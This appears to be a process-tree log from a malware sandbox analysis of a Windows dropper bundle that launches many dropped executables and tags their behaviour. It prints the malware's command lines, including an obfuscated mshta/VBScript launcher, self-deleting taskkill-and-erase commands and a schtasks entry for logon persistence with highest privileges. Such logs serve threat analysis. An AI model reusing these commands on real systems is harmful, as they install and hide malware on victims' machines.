C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /R cOpY /Y "C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe" ..\kPBhgOaGQk.exe&&sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi &If "/PLQtzfgO0m8dRv4iYALOqi "=="" for %M in ("C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe" ) do taskkill -f -iM "%~NxM"11⤵PID:3704
-
-
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill -f -iM "search_hyperfs_206.exe"9⤵
- Kills process with taskkill
PID:2588
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\setup.exe"C:\Users\Admin\AppData\Local\Temp\setup.exe"6⤵PID:2492
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im "setup.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\setup.exe" & exit7⤵PID:1568
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im "setup.exe" /f8⤵
- Kills process with taskkill
PID:2388
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\guixiangli-game.exe"C:\Users\Admin\AppData\Local\Temp\guixiangli-game.exe"6⤵PID:2232
-
-
C:\Users\Admin\AppData\Local\Temp\Calculator Installation.exe"C:\Users\Admin\AppData\Local\Temp\Calculator Installation.exe"6⤵PID:3160
-
-
C:\Users\Admin\AppData\Local\Temp\chrome1.exe"C:\Users\Admin\AppData\Local\Temp\chrome1.exe"6⤵PID:3284
-
-
C:\Users\Admin\AppData\Local\Temp\chrome2.exe"C:\Users\Admin\AppData\Local\Temp\chrome2.exe"6⤵PID:3316
-
-
C:\Users\Admin\AppData\Local\Temp\chrome3.exe"C:\Users\Admin\AppData\Local\Temp\chrome3.exe"6⤵PID:3484
-
-
C:\Users\Admin\AppData\Local\Temp\Chrome5.exe"C:\Users\Admin\AppData\Local\Temp\Chrome5.exe"6⤵PID:3576
-
C:\Windows\System32\conhost.exe"C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Local\Temp\Chrome5.exe"7⤵PID:3552
-
C:\Windows\System32\cmd.exe"cmd" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Users\Admin\AppData\Roaming\services64.exe"8⤵PID:4064
-
-
C:\Windows\System32\cmd.exe"cmd" cmd /c "C:\Users\Admin\AppData\Roaming\services64.exe"8⤵PID:3740
-
-
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Wed12640230114af0.exe3⤵
- Loads dropped DLL
PID:1740
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Wed12f7252371e9b59.exe3⤵
- Loads dropped DLL
PID:1488 -
C:\Users\Admin\AppData\Local\Temp\7zS032B36B5\Wed12f7252371e9b59.exeWed12f7252371e9b59.exe4⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of AdjustPrivilegeToken
PID:1612 -
C:\Users\Admin\AppData\Roaming\5425358.exe"C:\Users\Admin\AppData\Roaming\5425358.exe"5⤵PID:1124
-
-
C:\Users\Admin\AppData\Roaming\2238038.exe"C:\Users\Admin\AppData\Roaming\2238038.exe"5⤵PID:2604
-
-
C:\Users\Admin\AppData\Roaming\1500350.exe"C:\Users\Admin\AppData\Roaming\1500350.exe"5⤵PID:2700
-
-
C:\Users\Admin\AppData\Roaming\7616480.exe"C:\Users\Admin\AppData\Roaming\7616480.exe"5⤵PID:1736
-
-
C:\Users\Admin\AppData\Roaming\3488109.exe"C:\Users\Admin\AppData\Roaming\3488109.exe"5⤵PID:1988
-
-
C:\Users\Admin\AppData\Roaming\5213135.exe"C:\Users\Admin\AppData\Roaming\5213135.exe"5⤵PID:1588
-
C:\Users\Admin\AppData\Roaming\832877.exe"C:\Users\Admin\AppData\Roaming\832877.exe"6⤵PID:3812
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vBSCrIpt:clOSE (cReAteobject ("WScripT.shEll" ). rUN( "C:\Windows\system32\cmd.exe /q /c cOpY /y ""C:\Users\Admin\AppData\Roaming\832877.exe"" JYE8HiMhEASUD_.ExE&& sTART JYE8HiMhEASUD_.exE -p8pWd0QiD~JnefCwtTsZUP &iF """" == """" for %T iN ( ""C:\Users\Admin\AppData\Roaming\832877.exe"" ) do taskkill /im ""%~nXT"" -F ", 0 , tRuE) )7⤵PID:3860
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /q /c cOpY /y "C:\Users\Admin\AppData\Roaming\832877.exe" JYE8HiMhEASUD_.ExE&& sTART JYE8HiMhEASUD_.exE -p8pWd0QiD~JnefCwtTsZUP &iF "" == "" for %T iN ( "C:\Users\Admin\AppData\Roaming\832877.exe") do taskkill /im "%~nXT" -F8⤵PID:2172
-
-
-
-
C:\Users\Admin\AppData\Roaming\2375364.exe"C:\Users\Admin\AppData\Roaming\2375364.exe"6⤵PID:4036
-
-
-
C:\Users\Admin\AppData\Roaming\8909318.exe"C:\Users\Admin\AppData\Roaming\8909318.exe"5⤵PID:560
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Wed12e5a6a551c39b62a.exe3⤵
- Loads dropped DLL
PID:1972 -
C:\Users\Admin\AppData\Local\Temp\7zS032B36B5\Wed12e5a6a551c39b62a.exeWed12e5a6a551c39b62a.exe4⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetThreadContext
PID:628 -
C:\Users\Admin\AppData\Local\Temp\7zS032B36B5\Wed12e5a6a551c39b62a.exeC:\Users\Admin\AppData\Local\Temp\7zS032B36B5\Wed12e5a6a551c39b62a.exe5⤵
- Executes dropped EXE
- Loads dropped DLL
PID:2328
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Wed1245c5fe22f.exe3⤵
- Loads dropped DLL
PID:1976 -
C:\Users\Admin\AppData\Local\Temp\7zS032B36B5\Wed1245c5fe22f.exeWed1245c5fe22f.exe4⤵
- Executes dropped EXE
- Loads dropped DLL
PID:432 -
C:\Users\Admin\Pictures\Adobe Films\lUk26qyVjO9UoJCTiusz7f4A.exe"C:\Users\Admin\Pictures\Adobe Films\lUk26qyVjO9UoJCTiusz7f4A.exe"5⤵PID:2920
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 432 -s 14885⤵
- Program crash
PID:2124
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Wed12bf97133ddde4842.exe3⤵
- Loads dropped DLL
PID:1356 -
C:\Users\Admin\AppData\Local\Temp\7zS032B36B5\Wed12bf97133ddde4842.exeWed12bf97133ddde4842.exe4⤵
- Executes dropped EXE
PID:2020
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\7zS032B36B5\Wed12640230114af0.exeWed12640230114af0.exe1⤵
- Executes dropped EXE
- Loads dropped DLL
PID:1180 -
C:\Users\Admin\AppData\Local\Temp\7zS032B36B5\Wed12640230114af0.exe"C:\Users\Admin\AppData\Local\Temp\7zS032B36B5\Wed12640230114af0.exe" -u2⤵
- Executes dropped EXE
- Loads dropped DLL
PID:1460
-
-
C:\Windows\system32\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global1⤵
- Process spawned unexpected child process
- Executes dropped EXE
- Loads dropped DLL
PID:2676 -
C:\Windows\SysWOW64\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global2⤵
- Loads dropped DLL
PID:984
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k SystemNetworkService1⤵PID:1280
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 1280 -s 11762⤵
- Program crash
PID:3052
-
-
C:\Windows\system32\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global1⤵
- Process spawned unexpected child process
PID:3748 -
C:\Windows\SysWOW64\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global2⤵PID:3764
-
-
C:\Windows\system32\LogonUI.exe"LogonUI.exe" /flags:0x01⤵PID:3340
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k SystemNetworkService1⤵PID:3232